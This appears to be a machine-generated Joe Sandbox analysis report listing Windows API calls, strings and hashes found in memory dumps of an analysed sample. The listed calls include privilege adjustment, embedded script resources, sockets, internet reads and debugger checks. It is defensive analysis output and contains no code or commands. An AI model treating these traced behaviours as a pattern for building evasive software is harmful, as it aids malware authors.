                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                                    • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                                    • Opcode ID: 3c270b6dcaa8b1c0c7f553b15502077a83b4eb02b8b9dbc6956855bdb733e79d
                                                                                                                                                                                                                                                                                    • Instruction ID: 7013ca617f8083ce56d6c7e6b99ad1d8b6e5a79c271d44423ae4755a367ab483
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c270b6dcaa8b1c0c7f553b15502077a83b4eb02b8b9dbc6956855bdb733e79d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2601A27A6142116BEF1466B89CCABBB72ECDF08384F1505B1F912F31D2D9A09E41B590
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1BD54
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1BD78
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1BEFF
                                                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00B846D0), ref: 00B1BF11
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00BB221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00B1BF89
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00BB2270,000000FF,?,0000003F,00000000,?), ref: 00B1BFB6
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1C0CB
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 314583886-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e66ea313fd76ba7b4bf6f19a2d3fc74bbd1ce0a55d7908ce39d2defc8fa2c5cf
                                                                                                                                                                                                                                                                                    • Instruction ID: 56651c42793e76388902ad62dd0b8293f102f28f7058434b6fe373a3ec3a490a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e66ea313fd76ba7b4bf6f19a2d3fc74bbd1ce0a55d7908ce39d2defc8fa2c5cf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35C107729002059FDB249F68DC41EEABBF9EF45310F9445EAE585DB291EB708EC2CB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B256C2,?,?,00000000,00000000), ref: 00B53A1E
                                                                                                                                                                                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B256C2,?,?,00000000,00000000), ref: 00B53A35
                                                                                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00B256C2,?,?,00000000,00000000,?,?,?,?,?,?,00AE66CE), ref: 00B53A45
                                                                                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00B256C2,?,?,00000000,00000000,?,?,?,?,?,?,00AE66CE), ref: 00B53A56
                                                                                                                                                                                                                                                                                    • LockResource.KERNEL32(00B256C2,?,?,00B256C2,?,?,00000000,00000000,?,?,?,?,?,?,00AE66CE,?), ref: 00B53A65
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                    • String ID: SCRIPT
                                                                                                                                                                                                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                    • Opcode ID: 4b9358856ed5697e0709811427a9df8ac038648d2d7bc3872792d538d26fef14
                                                                                                                                                                                                                                                                                    • Instruction ID: 8101cb30b10f4f50fe9993e626ee41459d9f7d3dae36a54b0550442d79776548
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b9358856ed5697e0709811427a9df8ac038648d2d7bc3872792d538d26fef14
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69113971200701BFE7218B65DC48F2BBBF9EFC5B91F1442ACB946972A0DB71E9458A60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B41916
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B41922
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B41931
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B41938
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B4194E
                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,00B41C81), ref: 00B420FB
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B42107
                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00B4210E
                                                                                                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00B42127
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00B41C81), ref: 00B4213B
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B42142
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9a2a1dbfaa71daa7ac6ecbaf433f2ba26c029e2db04477fcff9056a9d067bb66
                                                                                                                                                                                                                                                                                    • Instruction ID: ed75c578a48b46e568d766b22d5ed97deabc4274b06983f59ed47f0c8380e25c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a2a1dbfaa71daa7ac6ecbaf433f2ba26c029e2db04477fcff9056a9d067bb66
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F311D071500204FFEB109FA4CC09FAEBBF9EF45395F944098FA45A7220CB359A81EB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00B5A5BD
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00B5A6D0
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B542B9: GetInputState.USER32 ref: 00B54310
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B542B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B543AB
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00B5A5ED
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00B5A6BA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                    • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                                    • Opcode ID: 9a0edfee6559a2b1221c970a537dba114721702930ba68ec99977036552a45f9
                                                                                                                                                                                                                                                                                    • Instruction ID: 81390a04b485c5d6dfec4fecb45876ad0ba7e7366a168a6bd858c4e8d1f14446
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a0edfee6559a2b1221c970a537dba114721702930ba68ec99977036552a45f9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39415C7190020AAFDB15DFA4C949BEEBBF4EF15351F1441D6E805B21A1EB709E88CF61
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,?), ref: 00AE233E
                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00AE2421
                                                                                                                                                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00AE2434
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Color$Proc
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 929743424-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 61112d9cae490dfbf27026ba079fc326c344d320e62c7e264cb26cb4a8085fde
                                                                                                                                                                                                                                                                                    • Instruction ID: cd76d0ff197590e746aab53513a5813be5e130ebf86ba3de87cb8b8a8ff38c09
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61112d9cae490dfbf27026ba079fc326c344d320e62c7e264cb26cb4a8085fde
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 608144B02044A1BAE639663A9C98FBF25EEEB42700B104249F107CE5A5C96DCF429772
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B63AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B63AD7
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B63AAB: _wcslen.LIBCMT ref: 00B63AF8
                                                                                                                                                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B622BA
                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B622E1
                                                                                                                                                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00B62338
                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B62343
                                                                                                                                                                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00B62372
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7059ec36de46bacc4221b83ebbcd319553550e3a7fba8adcde11515ee45c221e
                                                                                                                                                                                                                                                                                    • Instruction ID: ed8bbc4ad7392e9c8e606e715e0d3ea57eea2f29cc8f55b88bcbfeb18e2a28ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7059ec36de46bacc4221b83ebbcd319553550e3a7fba8adcde11515ee45c221e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A051C171A00200AFE710EF64C986F2A77E5EF44754F088098F9499F3C3CB75AD428BA1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2244d5139d3a6affceb44f7b7739c27a96861893d2d2abeacf432de2e7985d16
                                                                                                                                                                                                                                                                                    • Instruction ID: d4b3d21e9a23a8ac1cca31a11eea5c640bdcefd2bcf027b8d9a79291f077e4c0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2244d5139d3a6affceb44f7b7739c27a96861893d2d2abeacf432de2e7985d16
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2521E0317002108FE7199F2AC944B1A7BE5EF94364F19C0ADE85E8B352DB71ED42CB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00B5D8CE
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00B5D92F
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 00B5D943
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 35c9f9315ea628e1baa820035857bf038b4ca58744fe74293077de62f80e24af
                                                                                                                                                                                                                                                                                    • Instruction ID: c65f16241e308d780d63ee0970019c65bcd89c0dc2b3bffd7508b398f7ae9d12
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35c9f9315ea628e1baa820035857bf038b4ca58744fe74293077de62f80e24af
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4821A171500705EFE7309F65C888BAA77FCEF40315F10459DEA4692191EB70EE49CB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00B246AC), ref: 00B4E482
                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00B4E491
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B4E4A2
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B4E4AE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c8492e079e904f3ee24d4ff4d2987d7883c4e36c00dcfc625f96248a48a79ccd
                                                                                                                                                                                                                                                                                    • Instruction ID: 9148a4c20b04388439a6f21de04a7a4b87c241eea616b9221d56fac3337c5903
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8492e079e904f3ee24d4ff4d2987d7883c4e36c00dcfc625f96248a48a79ccd
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEF0A0304109105B92106B38EC0D8AE77BDFE02335B504B81F87AC22E0DB78DA96A695
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: LocalTime
                                                                                                                                                                                                                                                                                    • String ID: %.3d$X64
                                                                                                                                                                                                                                                                                    • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                                    • Opcode ID: 12e8249fbe1150c94acfc82c357e7078a8b078d54b64ca5820f9629bc3beb286
                                                                                                                                                                                                                                                                                    • Instruction ID: f94dc1c304450d117426ba5466066467485be865f353ff7df4e93f3fd026dfd6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12e8249fbe1150c94acfc82c357e7078a8b078d54b64ca5820f9629bc3beb286
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FED062B1C0811CEACB90DA90DDCADB973FCAB19741F7444D7F916E1091EB24D9449B25
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00B12A8A
                                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00B12A94
                                                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00B12AA1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a31252309bd357ed6f7945261c9f8adc14124432a67104e1d7e3853e64e9e715
                                                                                                                                                                                                                                                                                    • Instruction ID: c3ab90cc04a6c305866f72b6fbf677aef7e10a27c58a035443b08a71777b28e7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a31252309bd357ed6f7945261c9f8adc14124432a67104e1d7e3853e64e9e715
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B231B6759112189BCB21DF68D9897DDBBF4AF08310F5042EAE80CA7251EB309BC58F55
                                                                                                                                                                                                                                                                                    APIs
